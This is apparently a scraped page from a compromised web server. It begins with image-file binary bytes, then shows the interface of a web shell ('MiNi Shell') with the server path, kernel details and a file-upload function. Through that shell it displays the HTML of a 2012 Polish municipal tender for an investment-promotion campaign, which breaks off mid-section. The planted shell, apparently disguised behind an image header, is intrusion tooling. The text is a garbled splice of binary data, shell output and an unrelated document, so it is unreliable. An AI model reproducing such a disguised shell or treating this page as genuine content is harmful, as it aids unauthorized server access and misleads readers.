JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/131360-N-2012.html

<p class="kh_header"><b>Świętochłowice: Przygotowanie i przeprowadzenie kompleksowej kampanii reklamowej terenów inwestycyjnych Miasta Świętochłowice pn.: Świętochłowice. Bliżej niż myślisz - Promocja terenów inwestycyjnych miasta.</b><br>
<b>Numer ogłoszenia: 131360 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świętochłowice reprezentowana przez Prezydenta Miasta Świętochłowice , ul. Katowicka 54, 41-600 Świętochłowice, woj. śląskie, tel. 32 3491 800, faks 32 349 18 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swietochlowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie kompleksowej kampanii reklamowej terenów inwestycyjnych Miasta Świętochłowice pn.: Świętochłowice. Bliżej niż myślisz - Promocja terenów inwestycyjnych miasta..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaplanowanie i przeprowadzenie kampanii promującej tereny inwestycyjne Miasta Świętochłowice ,  w powiązaniu z Księgą identyfikacji wizualnej znaku Świętochłowice. Bliżej niż myślisz.
Kampania powinna łączyć działania informacyjne o mieście, jego lokalizacji, idei bliskości w sensie przestrzennym i przenośnym zawartej w haśle promocyjnym miasta, jego potencjale. Celem kampanii jest zainteresowanie przedsiębiorców ofertą  inwestycyjną miasta. Grupą docelową kampanii są głównie inwestorzy krajowi i zagraniczni, przedstawiciele firm consultingowych branży inwestycyjnej, a także deweloperzy, doradcy biznesowi, przedstawiciele instytucji otoczenia biznesu, turyści biznesowi. 
Przekazy na wszystkich materiałach muszą odpowiadać aktualnym wymaganiom w zakresie informacji i promocji projektu współfinansowanego ze środków Unii Europejskiej: muszą więc zawierać odpowiednie znaki graficzne z odwołaniem słownym do Unii Europejskiej, Europejskiego Funduszu Rozwoju Regionalnego i Programu Operacyjnego oraz zapis Kampania finansowana przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.

Zamawiający podzielił przedmiot zamówienia  na trzy zadania, trzy części:  
Opis poszczególnych zadań wchodzących w przedmiot zamówienia:

Zadanie 1  Przygotowanie i wykonanie prezentacji multimedialnej i folderów promocyjnych.  
Obejmuje przygotowanie i wykonanie prezentacji multimedialnej w formie spotu  reklamowego wraz z tłumaczeniem 
na 3 języki obce i dwukrotną aktualizacją do grudnia 2013 r., oraz przygotowanie i wykonanie folderów promocyjnych wraz z tłumaczeniem na 3 języki.
Działania:
1.Wykonanie i powielenie w ilości 100 sztuk prezentacji multimedialnej w formie spotu reklamowego wraz z tłumaczeniem w formie lektora na 3 języki obce (angielski, niemiecki, francuski) na płycie DVD, wytłoczonej wraz z nadrukiem w pełnym kolorze. Pudełka Digipack A5 jednołamowe 4P, jedna tacka na płytę, karton 250-300g, nadruk w pełnym kolorze, foliowanie błyszczące, lakier punktowy UV. Wykonawca do grudnia 2013 r. dwukrotnie wykona aktualizację spotu, a po każdej aktualizacji dostarczy 100 sztuk nowych płyt DVD.
30 sekundowy spot reklamowy musi spełniać wszystkie wymogi techniczne telewizji ogólnopolskiej - format HD i SD z muzyką i dźwiękiem dolby digital (5.1).
Z chwilą przekazania spotu przez Wykonawcę staje się on własnością Zamawiającego bez konieczności zapłaty dodatkowego wynagrodzenia. Wykonawca zobowiązuje się do przeniesienia na Zamawiającego  autorskich praw majątkowych do przedmiotu zamówienia na wszelkich polach eksploatacji, w tym utrwalania, zapisu, zwielokrotniania, sporządzania kopii dowolną techniką, upubliczniania w Internecie i innej sieci komputerowej, odtwarzania, reemitowania w różnych formach. 
Zamawiający oczekuje od Wykonawcy przygotowania szczegółowego scenariusza spotu i przedstawienia go do akceptacji. Zamawiający dopuszcza zarówno formę animowaną filmu, jak i fabularną. Jednocześnie Zamawiający nie określa kwestii technicznych wykonania spotu, pozostawiając to w gestii Wykonawcy.
Spot powinien zawierać informacje w postaci zestawu znaków graficznych dotyczących dofinansowania projektu z Unii Europejskiej, zgodnie z aktualnie obowiązującą instrukcją zamieszczoną w Wytycznych Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji i promocji, która dostępna jest na stronie internetowej www.rpo.slaskie.pl.
Wykonawca przedstawi do akceptacji Zamawiającego szczegółowy scenariusz spotu oraz graficzny projekt okładki i płyty DVD .
2.Zaprojektowanie i wykonanie folderu promocyjnego wraz z tłumaczeniem na 3 języki (wersja polsko - angielsko - niemiecko - francuska), zawierającego prezentację potencjału gospodarczego miasta (tekst, tabele, zdjęcia, wykresy) - 6 stron formatu B5, nakład 15.000 sztuk - gramatura papieru: 250 g/m2, kolorystyka: 4+4, uszlachetnianie: folia matowa, punktowo lakierowana. Oferta w tym zakresie obejmuje: projekt graficzny, wykonanie 20 zdjęć miasta, skład, tłumaczenie, korekty, druk, dostawę do siedziby Zamawiającego. 
Teksty potrzebne do wykonania folderu zostaną dostarczone przez Zamawiającego.
Koncepcja folderu powinna być spójna z prezentacją multimedialną oferty inwestycyjnej.
Projekty materiałów promocyjnych przekazane zostaną Zamawiającemu wraz z gotowym produktem.

Zadanie 2 Organizacja dwóch wizyt biznesowych w Świętochłowicach, tzw. study tour, prezentujących wskazane tereny inwestycyjne i potencjał miasta.
Zadanie obejmuje organizację 2 wizyt biznesowych, tzw. study tours w Świętochłowicach. Uczestnikami study tour mają być m. in. krajowi i zagraniczni inwestorzy, deweloperzy, architekci, attachés handlowi ambasad, przedstawiciele izb gospodarczych i regionalnych biur obsługi inwestora, szefowie działów firm odpowiedzialnych za ekspansję, pracownicy firm consultingowych z branży inwestycyjnej. Wizyty biznesowe zostaną zorganizowane w czerwcu 2012 r. i w czerwcu 2013 r. Planuje się zaproszenie 50 osób łącznie w dwóch edycjach imprezy (nie mniej niż 20 osób w jednej edycji). 
Działania:
1.Zakwaterowanie uczestników w hotelu. 
Zakwaterowanie zaproszonych gości 2 noclegi ze śniadaniem w pokojach jednoosobowych, w jednym hotelu o standardzie co najmniej 3 - gwiazdkowym wraz z miejscem parkingowym, zlokalizowanym w odległości maksymalnie 15 min. dojazdu do Świętochłowic. 
2.Transport uczestników w czasie trwania study tour.
Zapewnienie autokaru klasy LUX z nagłośnieniem i mikrofonem dla gości (łącznie 50 osób) na cały czas trwania study tour.
2.Zorganizowanie spotkań władz miasta z inwestorami, środowiskami gospodarczymi, przedstawicielami instytucji otoczenia biznesu, dziennikarzami itd. 
-zorganizowanie dwóch kolacji biznesowych (w pierwszym i drugim dniu trwania study tour)
-zorganizowanie spotkania plenerowego na terenie inwestycyjnym przy ul. Uroczysko. Podczas spotkania Wykonawca powinien zapewnić wzlot balonem/balonami na uwięzi na wysokość ok. 50 m i umożliwić skorzystanie z tej atrakcji wszystkim uczestnikom study tour (łącznie będzie 50 osób w obu edycjach study tour, ale nie mniej niż 20 osób w jednej edycji). Wzniesienie balonem umożliwione zostanie również osobom towarzyszącym i dziennikarzom, których łączna liczba nie przekroczy 25 osób na każdą edycję study tour. 
Kosz balonu musi być oznaczony z każdej strony logotypem i hasłem promocyjnym miasta. 
-zorganizowanie konferencji w Centrum Integracji Społecznej (CIS) w Świętochłowicach - Lipinach z wykorzystaniem przygotowanych materiałów promocyjnych, wchodzących w zakres zadania nr 1 niniejszego zamówienia.
-zorganizowanie spotkania w Urzędzie Miejskim w ostatnim, trzecim dniu study tour
3.Wyżywienie uczestników.
Przygotowanie posiłków dla uczestników study tour:  
Obiad podczas spotkania plenerowego powinien składać się z aperitifu i dwóch dań. 
-aperitif: napoje alkoholowe (piwo, wino), woda, soki wraz z przekąskami (np. orzeszki ziemne, pistacje, chipsy itp.)
-tradycyjny obiad śląski: rosół z makaronem, kluski śląskie, ziemniaki, rolada wołowa, czerwona kapusta, biała kapusta, kawa, herbata, piwo, wino, tradycyjny śląski kołocz, ciasto, owoce. 
Wykonawca powinien uwzględnić indywidualne życzenia gości dot. menu wynikające z ich diety wegetariańskiej, wskazań zdrowotnych, uwarunkowań kulturowych i religijnych. Zamawiający najpóźniej na 2 tygodnie przed terminem study tour poinformuje Wykonawcę o indywidualnych wymaganiach gości. Należy się jednak spodziewać, że będą to sytuacje wyjątkowe. Wykonawca zabezpieczy również posiłek (ciepły, jednodaniowy np. bigos lub bogracz wraz z pieczywem) dla osób towarzyszących oraz przedstawicieli mediów obsługujących imprezę, w łącznej liczbie nie większej niż 25 osób. Obiad i posiłek dla osób towarzyszących podany będzie na terenie inwestycyjnym w rejonie ul. Uroczysko. 
Kolacje podawane będą w pensjonacie Willa Styl (pierwszy dzień) oraz restauracji Skałka (drugi dzień). Zamawiający nie określa dokładnie szczegółowego menu, jednakże w pensjonacie Willa Styl kolacja musi się składać z przystawki, ciepłego posiłku, zimnej płyty, napojów zimnych i alkoholowych oraz deseru, a kolacja 
w restauracji Skałka przygotowana zostanie w formie tzw. grilla (pieczony prosiak, kiełbasa i krupniok, piwa: tyskie, żywiec lub równoważne; kawa, herbata, napoje zimne niegazowane: soki, woda mineralna). Rezerwacji obu restauracji dokonuje Wykonawca.
W przerwie konferencji w CIS w Świętochłowicach - Lipinach realizowana będzie usługa cateringowa, w ramach której należy podać: paluszki słone, chipsy, ciasteczka kruche, kawę, herbatę, napoje zimne niegazowane: soki, wodę mineralną. 
4.Ubezpieczenie uczestników. 
Wykonawca zapewnia ubezpieczenie wszystkich uczestników wizyty biznesowej od następstw nieszczęśliwych wypadków. Lista osób uczestniczących w study tour, zostanie przekazana Wykonawcy na 2 tygodnie przed terminem wizyty.
5.Zapewnienie personelu. 
-zapewnienie koordynatora study tour odpowiedzialnego za przebieg całej wizyty biznesowej, od przybycia gości do hotelu do momentu ich wyjazdu, będącego w stałym kontakcie z Zamawiającym,
-zapewnienie moderatora do prowadzenia konferencji,  
-zapewnienie tłumaczy symultanicznych w trakcie trwania konferencji w CIS (dyskusja winna być tłumaczona na języki obce - w zależności od potrzeb) oraz tłumaczy zapewniających sprawną obsługę gości w czasie całej wizyty. Zamawiający przewiduje wysłanie zaproszeń do uczestników wizyty z maksymalnie 3 krajów europejskich i Chin. O liczbie gości i kraju ich pochodzenia Zamawiający poinformuje Wykonawcę, po potwierdzeniu przez nich udziału, najpóźniej na 2 tygodnie przed terminem study tour. Czas trwania konferencji Zamawiający szacuje na ok. 2 - 2,5 godz. Usługa tłumaczenia konsekutywnego obejmuje wszystkie punkty programu, które realizowane będą podczas trwania wizyty w Świętochłowicach, a liczba tłumaczy uzależniona będzie od uczestników zagranicznych wizyty biznesowej,  
-zapewnienie kelnerów do obsługi gości podczas obiadu plenerowego oraz kolacji,
-zapewnienie służb technicznych do obsługi nagłośnienia.
6.Pozostałe wymagania  					 
-zaproponowanie listy gości i wysłanie zaproszeń wraz z programem pobytu do uzgodnionej z Zamawiającym listy potencjalnych uczestników (ostateczną listę uczestników przygotuje Zamawiający),
-Zamawiający nie określa minimalnej liczby państw, z których mają pochodzić uczestnicy study tour.  Zamawiający przewiduje wysłanie zaproszeń do uczestników wizyty z maksymalnie 3 krajów europejskich i Chin. 
O liczbie gości i kraju ich pochodzenia Zamawiający poinformuje Wykonawcę po potwierdzeniu przez nich udziału, najpóźniej na 2 tygodnie przed  terminem study tour.
-przygotowanie identyfikatorów dla wszystkich uczestników wizyty (gospodarzy i gości) oraz pakietu dla inwestora, zawierającego m. in. materiały wykonane w ramach zadania nr 1,
-w przypadku złej pogody (ulewny deszcz, zbyt silny wiatr itp.) uniemożliwiającej zrealizowanie programu na terenie przy ul. Uroczysko, obiad  zostanie podany w restauracji Skałka, a wzlot balonem nie odbędzie się, 
-zapewnienie zaplecza sanitarnego w czasie plenerowego obiadu,
-zapewnienie kabin tłumaczeniowych (konferencja w CIS) wraz z niezbędnym oprzyrządowaniem,  których liczba uzależniona będzie od liczby cudzoziemców, biorących udział w study tour i kraju ich pochodzenia. Informacje te znane będą Zamawiającemu na 2 tygodnie przed terminem study tour,
-spotkanie plenerowe powinno odbywać się w namiocie o powierzchni min. 150 m2, w którym podany będzie aperitif oraz obiad. Dodatkowo powinien być zabezpieczony drugi namiot o powierzchni min. 100 m2 dla organizatorów, przedstawicieli mediów obsługujących imprezę oraz osób towarzyszących - maksymalnie dla 25 osób. W obu namiotach należy zapewnić uczestnikom miejsca siedzące,
-przygotowanie formularza ankiety oceniającej wizytę biznesową, w tym m. in.  przydatność przekazanych w trakcie wizyty wiadomości, organizację wizyty biznesowej, poziom świadczenia usługi przez Wykonawcę (moderator, tłumacze, hotel, wyżywienie itp.).

Zadanie 3 Przeprowadzenie kampanii promocyjnej w portach lotniczych, na portalach internetowych, billboardach, w siedzibach placówek dyplomatycznych.
Zadanie obejmuje przeprowadzenie kampanii promocyjnej w 2 portach lotniczych, na portalach internetowych, billboardach, w siedzibach placówek dyplomatycznych lub organizacji (instytucji) gospodarczych. 
Działania: 
1.Zapewnienie reklamy terenów inwestycyjnych Świętochłowic w portach lotniczych Katowice - Pyrzowice oraz Kraków - Balice w terminie od 1 czerwca 2012 r.  do 31 grudnia 2013 r., w ciągu 7 kolejnych pełnych miesięcy kalendarzowych. Reklama terenów inwestycyjnych zostanie umieszczona na wózkach bagażowych oraz tablicach - modułach informacyjno reklamowych, wg poniższego schematu będącego integralną częścią niniejszej specyfikacji:
a) Port lotniczy Katowice - Pyrzowice 
-wózki bagażowe - 200 sztuk - reklama - tablica dwustronna, prostokątna  umocowana trwale do wózka o wymiarach nie mniejszych niż: przód 52 cm x 26 cm, tył 52 cm x 30 cm
-reklama statyczna w formie 1 sztuki banera podwieszanego niepodświetlanego  o wymiarach 400 cm x 130 cm. 
b) Port lotniczy Kraków - Balice
-wózki bagażowe - 300 sztuk - reklama - tablica prostokątna umocowana trwale do wózka o wymiarach nie mniejszych niż: 50 cm x 40 cm,
-reklama statyczna w formie 1 sztuki banera dwustronnego, podwieszanego pod sufitem w części ogólnodostępnej o wymiarach 300 cm x 120 cm.  
Zamawiający dopuszcza sytuację, w której okres umieszczenia reklamy na wózkach bagażowych,  nie będzie pokrywał się z okresem reklamy na banerach. 
Wykonawca ponosi wszelkie ewentualne koszty wykonania, montażu i demontażu nośników. Reklama umieszczona w portach lotniczych musi być spójna z ogólną koncepcją zadania. Zamawiający zastrzega sobie prawo do akceptacji projektów reklam.
2.Wynajęcie 10 tablic promocyjno - informacyjnych, wykonanie ich montażu na 10 wskazanych przez Zamawiającego terenach inwestycyjnych ulokowanych na terenie miasta Świętochłowice, z zastrzeżeniem, iż jedna tablica jest przypisana do jednego terenu. Tablica musi zostać wykonana z materiału wodo- i mrozoodpornego, nierdzewnego oraz odpornego na wszelkie inne formy korozji, co najmniej przez okres do 31 grudnia 2013 r.. Na tablicach Wykonawca  obowiązany jest umieścić dane charakteryzujące teren, uzgodnione z Zamawiającym oraz opisy zgodne z wytycznymi dot. promocji projektu. Tablica zostanie na trwale umieszczona w gruncie przez Wykonawcę, jednak konkretne miejsce lokalizacji musi uzyskać akceptację Zamawiającego. Tablica musi mieć kształt prostokąta o wymiarach nie mniejszych niż 200 cm x 300 cm.  Wykonawca  uzyska wszelkie wymagane zezwolenia i uzgodnienia przewidziane odrębnymi przepisami prawa budowlanego i poniesie wszelkie ewentualne opłaty związane z uzyskaniem tych uzgodnień. Wygląd tablic musi być spójny z ogólną koncepcją zadania, a projekty tablic powinny uzyskać akceptację Zamawiającego.  
3.Przeprowadzenie kampanii informacyjnej poprzez umieszczenie reklam promujących ofertę inwestycyjną miasta w terminie od 1 czerwca 2012 r. do 31 grudnia 2013 r.  lub do wyczerpania odsłon na wymienionych niżej portalach internetowych, wg schematu:  
-serwis ekonomiczny portalu Onet.pl (www.biznes.onet.pl) - 100.000 odsłon, emisja na stronie głównej, reklama typu triple billboard - w liczbie 2 kampanii.
-portal WP.pl (www.wp.pl) - 1.000.000 odsłon, emisja na stronie głównej, reklama typu double billboard - w liczbie 2 kampanii. 
-portal Rzeczpospolita (www.rp.pl) - 100.000 odsłon, emisja na stronie głównej, reklama typu double billboard - w liczbie 2 kampanii. 
-portal ekonomiczny Gazety Wyborczej (www.wyborcza.biz) - 100.000 odsłon, emisja na stronie głównej, reklama typu double billboard - pakiet premium, w liczbie 2 kampanii. 
Poprzez pojęcie kampanii rozumie się liczbę odsłon w danym portalu. Poszczególne kampanie należy przeprowadzić osobno w poszczególnych, kolejno następujących po sobie kwartałach lat 2012 i 2013, i pojedynczo tylko w jednym portalu. Jedynie raz, w jednym kwartale dopuszcza się możliwość poprowadzenia kampanii równolegle na dwóch portalach. 
Wykonawca zapewni nałożenie limitu wyświetleń reklam oferty inwestycyjnej miasta  na unikalnego  użytkownika - capping = 3, w czasie  jednej kampanii promocyjnej. Zleceniobiorca przygotuje projekty i wykona materiał do umieszczenia w portalu. Zamawiający zastrzega sobie prawo do akceptacji projektów reklam.
Kampania informacyjna prowadzona w powyższych portalach musi się charakteryzować następującymi cechami:
- musi posiadać przekierowanie do strony internetowej www.swietochlowice.pl, 
- musi być przygotowana w wersji Flash. 
3.Wykonawca  udokumentuje poprzez zrzuty z ekranu fakt pojawienia się reklam na wszystkich w/w portalach i liczbę odsłon. Reklama umieszczona w portalach internetowych musi być spójna z ogólną koncepcją zadania. 
4.Wykonawca umieści foldery promocyjne miasta, wykonane w ramach zadania nr 1 niniejszego zamówienia publicznego, w ambasadzie i przedstawicielstwach dyplomatycznych Chińskiej Republiki Ludowej i Republiki Indii w RP. Zamawiający dopuszcza alternatywnie możliwość umieszczenia folderów w instytucjach, których misją jest wspieranie rozwoju kontaktów polsko-chińskich i polsko-indyjskich na szczeblu firm, organizacji i instytucji gospodarczych (np. Polsko-Chińska Izba Gospodarcza, Polsko-Chińska Izba Przemysłowo-Handlowa lub Polsko-Indyjska Izba Gospodarcza) lub w ambasadach innych krajów azjatyckich: Japonii lub Korei Południowej.
W ramach całości zamówienia Wykonawca zobowiązany jest do wykonania i montażu  dwóch tablic  informacyjno - pamiątkowych w budynku Urzędu Miejskiego.
Zamawiający wymaga od Wykonawcy udziela gwarancji jakości na wszystkie elementy wchodzące w zakres zamówienia objętego specyfikacją istotnych warunków zamówienia:  
a) tablice informacyjne - na czas realizacji projektu, tj. 19 miesięcy.
b) tablice pamiątkowe - na okres trwałości projektu, tj. 5 lat.
c) tablice reklamowe na wózkach bagażowych i banery w portach lotniczych - na okres 7 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9, 79.34.14.00-0, 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia w przypadku składania oferty na zadanie nr 1 Wykonawca musi wykazać, iż w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy niż  3 lata to za okres prowadzenia działalności wykonał,  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, co najmniej 2 usługi  polegające na przygotowaniu i wykonaniu prezentacji multimedialnej i folderów promocyjnych o wartości nie mniejszej niż 40.000zł brutto każda usługa.
W zakresie posiadania wiedzy i doświadczenia w przypadku składania oferty na zadanie nr 2 Wykonawca musi wykazać, iż w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy niż  3 lata to za okres prowadzenia działalności wykonał,  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,  co najmniej 2 usługi  polegające na organizacji imprez, konferencji, spotkań biznesowych o wartości nie mniejszej niż 80.000zł brutto każda usługa.
W zakresie posiadania wiedzy i doświadczenia w przypadku składania oferty na zadanie nr 3 Wykonawca musi wykazać, iż w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy niż  3 lata to za okres prowadzenia działalności wykonał,  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,  co najmniej 2 usługi  polegające na przeprowadzeniu kampanii promocyjnej o wartości nie mniejszej niż 350.000zł brutto każda usługa.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
